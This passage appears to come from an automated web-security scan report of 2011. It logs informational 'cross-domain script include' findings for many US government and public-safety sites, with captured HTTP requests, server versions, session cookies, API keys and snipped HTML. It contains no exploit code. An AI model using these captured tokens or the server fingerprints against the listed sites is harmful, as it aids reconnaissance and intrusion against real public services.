User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:26:34 GMT
Server: IBM_HTTP_Server
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 104823

<!-- Vignette V6 Thu Apr 14 11:41:34 2011 -->

<!-- e-Michigan Portal - Process #4, Server -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META http-equiv="Content-
...[SNIP]...
<span class='shortdesc'><script type="text/javascript" src="http://media.state.mi.us/media/mediaplayer-5.4-licensed/jwplayer.js"></script>
...[SNIP]...

20.57. http://obm.ohio.gov/document.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://obm.ohio.gov
Path:   /document.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /document.aspx HTTP/1.1
Host: obm.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:25:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27016


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<link rel="Stylesheet" type="text/css" href="Themes/Standard/Menus/menus.css" />
<script src="//www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.58. http://oh.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oh.gov
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: oh.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:26:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15536
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head>
<title>
...[SNIP]...
<meta name="robots" content="ALL"/>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

20.59. http://ok.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ok.gov
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: ok.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:40 GMT
Server: Apache
Last-Modified: Sat, 30 Apr 2011 10:30:03 GMT
ETag: "c28199-12a21-4a22045f240c0"
Accept-Ranges: bytes
Content-Length: 76321
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!-- Use IE7 mode -->
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
...[SNIP]...
<!--- add the live support chat button --> <script src="http://206.16.212.158/LiveSupport_OK/CuteSoft_Client/CuteChat/Support-Image-Button.js.aspx" type="text/javascript"></script>
...[SNIP]...

20.60. http://oregon.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oregon.gov
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: oregon.gov
Proxy-Connection: keep-alive
Referer: http://oregon.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=261762387.1304162104.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261762387.973826526.1304162104.1304162104.1304162104.1; __utmc=261762387; __utmb=261762387.1.10.1304162104

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:53 GMT
Server: IBM_HTTP_Server
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 55216


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en">
<head>
<title>Oregon.gov Home Page</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<
...[SNIP]...
</script>
<script src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.61. http://pa.gov/portal/server.pt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pa.gov
Path:   /portal/server.pt

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /portal/server.pt? HTTP/1.1
Host: pa.gov
Proxy-Connection: keep-alive
Referer: http://pa.gov/portal/server.pt/gateway%2527/PTARGS_0_2_24662_2966_368351_43/http
Cache-Control: max-age=0
Origin: http://pa.gov
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: plloginoccured=false; REQUESTURLBEFORESSO=; ptLastLoginAuthSource=
Content-Length: 128

in_hi_space=Login&in_hi_spaceID=82&in_hi_control=Login&in_hi_dologin=true&in_tx_username=&in_pw_userpass=&in_se_authsource=cwopa

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Language: en
Set-Cookie: ASP.NET_SessionId=uc2nxa33mmh2xs55wfhh52by; path=/
Expires: 1304080785543
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304167185543
Content-Type: text/html; charset=utf-8
Content-Length: 34484

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Log In</title><script type="
...[SNIP]...
</script><script type="text/javascript" src="http://www.portal.state.pa.us/imageserver/plumtree/portal/private/js/ptcommonopener.js"></script>
...[SNIP]...

20.62. http://pa.gov/portal/server.pt/community/pa_gov/2966  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pa.gov
Path:   /portal/server.pt/community/pa_gov/2966

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portal/server.pt/community/pa_gov/2966 HTTP/1.1
Host: pa.gov
Proxy-Connection: keep-alive
Referer: http://pa.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=40mdkvjbk1i3ut55p0o4ui55

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:49:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Language: en
Expires: 1304030976822
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304117376822
Content-Type: text/html; charset=utf-8
Content-Length: 66908

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>PA.gov</title><script type="
...[SNIP]...
</script><script type="text/javascript" src="http://www.portal.state.pa.us/imageserver/plumtree/portal/private/js/ptcommonopener.js"></script>
...[SNIP]...

20.63. http://sc.gov/Pages/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sc.gov
Path:   /Pages/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Pages/default.aspx HTTP/1.1
Host: sc.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerAgencySite=855793418.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63792
Content-Type: text/html; charset=utf-8
Expires: Sat, 30 Apr 2011 00:38:36 GMT
Vary: *
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6211
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 30 Apr 2011 00:36:03 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!-- SCRIPT REQUIRED FOR SEARCH- Please do not remove this -->
<html __expr-v
...[SNIP]...
<DIV class=inner>
<script src='http://206.16.212.158/LiveSupport_SC/CuteSoft_Client/CuteChat/Support-Image-Button.js.aspx'></script>
...[SNIP]...

20.64. https://secure.kentucky.gov/portal/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.kentucky.gov
Path:   /portal/login.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portal/login.aspx HTTP/1.1
Host: secure.kentucky.gov
Connection: keep-alive
Referer: http://kentucky.gov/Pages/home.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210812687.1304123849.1.1.utmcsr=ky.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=210812687.1043360039.1304123849.1304123849.1304123849.1; __utmc=210812687; __utmb=210812687.2.10.1304123849

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:43:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gqjt3255rvivxbzywyvuhdvc; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24079


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <title>Kentucky.gov: - Login</title>
<meta http-equiv="Content-Type" content="text/htm
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/g2p/styles/ssostyles/ky_portal_print.css" media="print" /><script src="https://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

20.65. https://secure.missingkids.com/missingkids/servlet/CybertipServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.missingkids.com
Path:   /missingkids/servlet/CybertipServlet

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /missingkids/servlet/CybertipServlet HTTP/1.1
Host: secure.missingkids.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 30 Apr 2011 12:28:18 GMT
Content-type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- MKPAGE=ContentMain.jsp -->
<html>
<head>

<title>National Center for Missing & Exploited Children</title>


<!-- MK
...[SNIP]...
<!-- Google Analytics -->

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.66. https://securetransactions.mva.maryland.gov/emvastore/MainMenu.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securetransactions.mva.maryland.gov
Path:   /emvastore/MainMenu.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /emvastore/MainMenu.aspx HTTP/1.1
Host: securetransactions.mva.maryland.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:28:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /emvastore/MainMenu.aspx?SingleUseWindowGuid=1e5891da-1af5-46a3-ba62-d047e294255a
Set-Cookie: ASP.NET_SessionId=wzgzbj451l2e10zwyb4mtabi; path=/; secure; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 23896

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2femvastore%2fMainMenu.aspx%3fSingleUseWindowGuid%3d1e5891da-1af5-46a3-ba62-d047e294255a">here</a>.</h2>
</body></h
...[SNIP]...
<td align="right">
<script src="https://seal.verisign.com/getseal?host_name=securetransactions.mva.maryland.gov&size=S&use_flash=YES&use_transparent=YES"></script>
...[SNIP]...

20.67. http://tn.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tn.gov
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: tn.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:36:43 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 29239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAvRmvonumlTAW8d8m82xewxQF1FeBydXy7UHGBlNsdFbv9KiZDBTWEauWy_nRs3RVKVIj9d6OkJPN3w"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=53c584b0-e5ea-446d-83bc-544476c174c5&amp;type=website&amp;buttonText=Share%20This&amp;post_services=email%2Cdigg%2Clinkedin%2Cfacebook%2Cdelicious%2Cstumbleupon%2Ctwitter%2Creddit%2Cwindows_live%2Cnewsvine%2Ctwine%2Cmyspace%2Cgbuzz%2Csms%2Cgoogle_bmarks%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress"></script>
...[SNIP]...

20.68. https://txapps.texas.gov/tolapp/txdl/welcome.dl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://txapps.texas.gov
Path:   /tolapp/txdl/welcome.dl

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tolapp/txdl/welcome.dl HTTP/1.1
Host: txapps.texas.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:26:52 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.30 mod_ssl/2.2.17 OpenSSL/1.0.0c
Content-Length: 3757
Set-Cookie: JSESSIONID=bRvLN8QDy0pSHzPd0y9jwDB2VzdxSmwpQPy9fyTfFv5xnvKCCxcJ!1245023878!1608377493; path=/; HttpOnly
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...
<![endif]-->
       <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script>
...[SNIP]...

20.69. https://unitedalert.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://unitedalert.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: unitedalert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:28:52 GMT
Server: Apache/2.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=ceiaqg112uta410c27gi7ihi84; path=/
Set-Cookie: X-Mapping-abiknkkh=3EEB2AE635DD7C372F7D3DF20A0A1F9F; path=/
Connection: close
Content-Length: 8865

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head><title>United Alert: Free Emergency Alert and Group Communication Service, SMS and Email </ti
...[SNIP]...
</a><script type="text/javascript" src="https://secure.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

20.70. http://www.511ia.org/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.511ia.org
Path:   /default.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /default.asp HTTP/1.1
Host: www.511ia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:27:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 103464
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQRTBDCD=FNHFKGFBDBEHNOIKFNCIKDFO; path=/
Cache-control: private


<html>
<head>
<title>Iowa DOT Travel Information Service</title>
<meta http-equiv="Refresh" content="300">
<meta http-equiv="Expires" content="4/30/2011 8:27:49 AM">
<meta http-equiv="Content-T
...[SNIP]...
</script>

                                   <script type="text/javascript" language="JavaScript" src="http://hits.webstat.com/cgi-bin/wsv2.cgi?61316"></script>
...[SNIP]...

20.71. http://www.addthis.com/bookmark.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96030

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
</style>
<script type="text/javascript" src="//cache.addthiscdn.com/www/q0275/js/bookmark.js"></script>
...[SNIP]...

20.72. http://www.agriculture.state.tn.us/Marketing.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agriculture.state.tn.us
Path:   /Marketing.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Marketing.asp HTTP/1.1
Host: www.agriculture.state.tn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8180
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSBDQRCB=HDNJABEBOEKCBCECEPFDIHMK; path=/
Date: Sat, 30 Apr 2011 12:29:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<!-- Begin Google Analytics -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...
<!-- Begin Crazy Egg Tracking Script KSWB 2-4-08 -->
<script type="text/javascript" src="http://cetrk.com/pages/scripts/0002/9694.js"> </script>
...[SNIP]...

20.73. http://www.alabama.gov/portal/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alabama.gov
Path:   /portal/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /portal/index.jsp HTTP/1.1
Host: www.alabama.gov
Proxy-Connection: keep-alive
Referer: http://al.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:36:24 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Cache-Control: private
Set-Cookie: JSESSIONID=abcI5QvmCkxSLfmPB1J_s; path=/
Content-Type: text/html
Content-Length: 34756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<link rel="stylesheet" href="http://www.google.com/cse/style/look/default.css" type="text/css" />


<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
<!-- http://www.alabama.gov -->
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAlxbvSZvRAu-yLQi3Hj8onxTAVazwWTlckXW9oa4-ReFxquV4EhT6O7o90LI_2zGKEuSVhlc2sk0VYw" type="text/javascript"></script>
...[SNIP]...

20.74. http://www.alabama.gov/portal/secondary.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alabama.gov
Path:   /portal/secondary.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portal/secondary.jsp?id=professional HTTP/1.1
Host: www.alabama.gov
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/secondary.jsp?sid=onlineServices
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=abczMjORTQ-kQ6HiE_J_s; __utmz=222685003.1304126433.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; alabama_gov_style=standardText; __utma=222685003.1298336245.1304123819.1304123819.1304126433.2; __utmc=222685003; __utmb=222685003.2.10.1304126433

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:21:48 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Content-Type: text/html
Content-Length: 40696


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...
<link rel="stylesheet" href="http://www.google.com/cse/style/look/default.css" type="text/css" />


<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

20.75. http://www.amberalert.com/en/alerts/state/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amberalert.com
Path:   /en/alerts/state/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/alerts/state/ HTTP/1.1
Host: www.amberalert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:39 GMT
Server:
X-Powered-By: PHP/5.2.14
Vary: Cookie
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.amberalert.com
X-Pingback: http://www.amberalert.com/wordpress/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/wordpress/wp-content/themes/wp-amber/header.css" />

<script type="text/javascript" src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAibdrbM6bGv_kF71q-mfDGxRkfg0JWmgrYRHAgUYhnCxeN5hduxTCNJG3VMBKmDZhIhIpGHrSwFS7zg&sensor=false&hl=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=amberalert"></script>
...[SNIP]...
</div>

<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript"></script>
...[SNIP]...
</div>
       <script type="text/javascript" src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAibdrbM6bGv_kF71q-mfDGxRkfg0JWmgrYRHAgUYhnCxeN5hduxTCNJG3VMBKmDZhIhIpGHrSwFS7zg&sensor=false&hl=en"></script>
...[SNIP]...
</div>
       <script type="text/javascript" src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAibdrbM6bGv_kF71q-mfDGxRkfg0JWmgrYRHAgUYhnCxeN5hduxTCNJG3VMBKmDZhIhIpGHrSwFS7zg&sensor=false&hl=en"></script>
...[SNIP]...
</div>
       <script type="text/javascript" src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAibdrbM6bGv_kF71q-mfDGxRkfg0JWmgrYRHAgUYhnCxeN5hduxTCNJG3VMBKmDZhIhIpGHrSwFS7zg&sensor=false&hl=en"></script>
...[SNIP]...
</script>-->

<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/zenbox-2.0.js"></script>
...[SNIP]...

20.76. http://www.archives.gov/shop/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.archives.gov
Path:   /shop/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /shop/ HTTP/1.1
Host: www.archives.gov
Proxy-Connection: keep-alive
Referer: http://www.archives.gov/veterans/military-service-records/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
